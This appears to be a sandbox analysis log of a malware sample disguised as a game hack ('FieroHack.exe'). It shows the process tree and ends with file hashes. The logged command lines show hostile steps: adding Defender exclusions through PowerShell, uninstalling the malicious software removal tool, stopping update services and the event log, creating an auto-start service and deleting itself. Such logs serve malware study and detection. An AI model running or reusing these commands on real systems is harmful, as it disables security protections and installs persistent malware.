  cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe (PID 3036)
  cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe (PID 2072)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\Explorer.EXE (PID 3344)
  cmdline: C:\Windows\Explorer.EXE
    C:\Users\Admin\AppData\Local\Temp\Midnight\FieroHack.exe (PID 1172)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Midnight\FieroHack.exe"
      signatures: Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Roaming\WeMod.exe (PID 1568)
          cmdline: C:\Users\Admin\AppData\Roaming\WeMod.exe
          signatures: Executes dropped EXE; Drops file in System32 directory; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 516)
              cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\cmd.exe (PID 1100)
              cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              signatures: Suspicious use of WriteProcessMemory
                C:\Windows\system32\wusa.exe (PID 4292)
                  cmdline: wusa /uninstall /kb:890830 /quiet /norestart
            C:\Windows\system32\sc.exe (PID 4816)
              cmdline: C:\Windows\system32\sc.exe stop UsoSvc
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 1920)
              cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 2172)
              cmdline: C:\Windows\system32\sc.exe stop wuauserv
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 3000)
              cmdline: C:\Windows\system32\sc.exe stop bits
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 3056)
              cmdline: C:\Windows\system32\sc.exe stop dosvc
              signatures: Launches sc.exe
            C:\Windows\system32\powercfg.exe (PID 3564)
              cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              signatures: Power Settings; Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\powercfg.exe (PID 2296)
              cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              signatures: Power Settings; Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\powercfg.exe (PID 4636)
              cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              signatures: Power Settings; Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\powercfg.exe (PID 4760)
              cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              signatures: Power Settings; Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\dialer.exe (PID 4628)
              cmdline: C:\Windows\system32\dialer.exe
            C:\Windows\system32\sc.exe (PID 1004)
              cmdline: C:\Windows\system32\sc.exe delete "BRSLGMVC"
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 2252)
              cmdline: C:\Windows\system32\sc.exe create "BRSLGMVC" binpath= "C:\ProgramData\ccghytpllojw\ritphyfejjmj.exe" start= "auto"
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 4532)
              cmdline: C:\Windows\system32\sc.exe stop eventlog
              signatures: Launches sc.exe
            C:\Windows\system32\sc.exe (PID 3100)
              cmdline: C:\Windows\system32\sc.exe start "BRSLGMVC"
              signatures: Launches sc.exe
                C:\Windows\System32\Conhost.exe (PID 3612)
                  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            C:\Windows\system32\cmd.exe (PID 372)
              cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\WeMod.exe"
              signatures: Suspicious use of WriteProcessMemory
                C:\Windows\System32\Conhost.exe (PID 1032)
                  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                C:\Windows\system32\choice.exe (PID 3652)
                  cmdline: choice /C Y /N /D Y /T 3
        C:\Users\Admin\AppData\Roaming\Sirus.exe (PID 1792)
          cmdline: C:\Users\Admin\AppData\Roaming\Sirus.exe
          signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            C:\Windows\SysWOW64\WerFault.exe (PID 556)
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 3288
              signatures: Program crash
C:\Windows\system32\svchost.exe (PID 3352)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe (PID 3500)
  cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe (PID 3748)
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe (PID 3912)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe (PID 4112)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe (PID 5076)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe (PID 1276)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe (PID 2680)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe (PID 4956)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (PID 2308)
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe (PID 3988)
  cmdline: C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe (PID 1468)
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe (PID 2280)
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe (PID 1088)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe (PID 1564)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe (PID 2424)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe (PID 3852)
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe (PID 2572)
  cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  signatures: Checks SCSI registry key(s)
C:\Windows\System32\svchost.exe (PID 2120)
  cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup
    C:\Windows\SysWOW64\WerFault.exe (PID 3664)
      cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1792 -ip 1792
C:\ProgramData\ccghytpllojw\ritphyfejjmj.exe (PID 3952)
  cmdline: C:\ProgramData\ccghytpllojw\ritphyfejjmj.exe
  signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82